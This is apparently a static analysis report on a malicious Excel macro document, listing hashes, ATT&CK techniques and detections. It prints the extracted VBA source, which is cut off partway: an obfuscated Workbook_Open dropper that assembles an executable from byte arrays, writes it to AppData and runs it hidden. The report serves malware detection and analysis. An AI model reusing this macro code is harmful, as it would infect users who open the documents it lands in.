Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef5e1af8b3e0f7f6…

MALICIOUS

Office (OLE)

62.5 KB Created: 2018-06-14 15:49:08 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: ba9fa0ec8de055e286fab60db4803226 SHA-1: c3cf7b955ec75c90859f92be83f8b3a43cefe75f SHA-256: ef5e1af8b3e0f7f6658a513a6008cbfb83710f54d8327423db4bb65fa03d3813
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is an Excel document containing a Workbook_Open VBA macro that uses the Shell() function. The macro attempts to execute a file named 'cuhlq.exe' from the user's AppData directory. The document body displays a fake error message to coerce the user into enabling macros, which is a common social engineering tactic.

Heuristics 5

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12662 bytes
SHA-256: 83bb03126b47b701d2ba6d207b1ddd290eb45b4f58c116d90f877d6c668d5d0a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BB"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AA"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WorKbOOK_oPEN(): Call hwslo: End Sub
Static Function hwslo() As Double
Call vbzig
End Function
Static Sub vbzig()
Call dwcxj
End Sub
Function dwcxj() As Double
Call rcjua
End Function
Function rcjua() As Single
Call yxmjd
End Function
Sub yxmjd()
Call mdtgv
End Sub
Static Function mdtgv() As Boolean
Call uywvx
End Function
Static Function uywvx() As Integer
Call iddsp
End Function
Static Sub iddsp()
Call pyggs
End Sub
Static Sub pyggs()
Call eenek
End Sub
Static Function eenek() As Long
Call aifzr(VBA.Environ$("apPDATa") & "\cuhlq.exe", ozpiu): Call VBA.Shell$(VBA.Environ$("apPDATa") & "\cuhlq.exe", vbHide)
End Function
Function ozpiu()
ozpiu = fbnmh
Call tpxnn(ozpiu, itwzj)
Call tpxnn(ozpiu, faeal)
Call tpxnn(ozpiu, jehnh)
Call tpxnn(ozpiu, rmyfd)
Call tpxnn(ozpiu, yexgl)
Call tpxnn(ozpiu, jmksw)
Call tpxnn(ozpiu, akacq)
Call tpxnn(ozpiu, layuc)
Call tpxnn(ozpiu, xrnjq)
Call tpxnn(ozpiu, nrzwv)
Call tpxnn(ozpiu, athld)
Call tpxnn(ozpiu, avdoc)
Call tpxnn(ozpiu, ywmzk)
Call tpxnn(ozpiu, hiheo)
Call tpxnn(ozpiu, hfdqt)
Call tpxnn(ozpiu, loeuj)
Call tpxnn(ozpiu, npetw)
Call tpxnn(ozpiu, csyau)
Call tpxnn(ozpiu, rjijy)
Call tpxnn(ozpiu, qplfq)
Call tpxnn(ozpiu, xpbtj)
Call tpxnn(ozpiu, zuzjq)
Call tpxnn(ozpiu, iqbxh)
Call tpxnn(ozpiu, esgma)
Call tpxnn(ozpiu, prmoz)
Call tpxnn(ozpiu, dzonq)
Call tpxnn(ozpiu, hzjht)
Call tpxnn(ozpiu, ayqoo)
End Function
Private Sub tpxnn(ByRef spurv As Variant, ByRef omapv As Variant): Dim fuxjb As Long: Dim mpfdc As Long: mpfdc = UBound(spurv) + 1: ReDim Preserve spurv(mpfdc + UBound(omapv)): For fuxjb = LBound(omapv) To UBound(omapv): spurv(mpfdc + fuxjb) = omapv(fuxjb): Next: End Sub
Function aifzr(hxesc, vjpll):       Dim bxlzl, aleho:           bxlzl = FreeFile:           Open hxesc For Binary Access Read Write As #bxlzl:              For aleho = LBound(vjpll) To UBound(vjpll):             Put #bxlzl, , CByte(vjpll(aleho)):      Next:       Close #bxlzl:       End Function
Function fbnmh()
fbnmh = Array(77, 90, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 64, 0, 0, 0, 80, 69, 0, 0, 76, 1 _
, 1, 0)
End Function
Function itwzj()
itwzj = Array(84, 106, 34, 91, 0, 0, 0, 0, 0, 0 _
, 0, 0, 224, 0, 14, 3, 11, 1, 0, 0 _
, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0 _
, 0, 0, 0, 0, 0, 0, 64, 0, 0, 16 _
, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function faeal()
faeal = Array(0, 32, 0, 0, 0, 2, 0, 0, 0, 0 _
, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0 _
, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16 _
, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function jehnh()
jehnh = Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0)
End Function
Function rmyfd()
rmyfd = Array(0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0 _
, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0 _
, 22, 5, 0, 0, 0, 2, 0, 0, 0, 0 _
, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 _
, 32, 0, 0, 160, 0, 0, 0, 0, 0, 0 _
, 0, 0
... (truncated)